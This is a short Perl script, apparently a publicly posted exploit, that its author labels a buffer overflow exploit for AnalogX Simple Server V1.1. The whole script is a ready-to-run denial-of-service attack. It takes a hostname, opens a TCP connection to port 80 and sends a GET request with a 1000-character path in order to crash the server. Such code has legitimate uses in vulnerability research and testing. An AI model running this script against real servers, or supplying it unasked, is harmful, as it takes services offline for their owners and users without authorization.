#!/usr/bin/perl # Description: Buffer overflow exploit for AnalogX Simple Server V1.1 # Author: Xcript (xcript@rhs-ck.com) # Website: http://www.rhs-ck.com use IO::Socket; if ($ARGV[0] eq $null) { print "\nUSAGE: perl axsploit.pl <hostname>\n"; exit; } $host = $ARGV[0]; $port = '80'; $buffer = 'x' x 1000; print "\nEstablishing connection to host[$host] Please wait...\n"; $socket = new IO::Socket::INET (Proto => 'tcp', PeerAddr => $host, PeerPort => $port) or die &socket_error; print "\nConnected.\n\nAttemping to kill AnalogX Simple Server..."; print $socket "GET $buffer HTTP/1.1\n\n"; close ($socket); print "\n\nDone.\n"; sub socket_error { print "\nConnection failed.\n"; exit; } exit;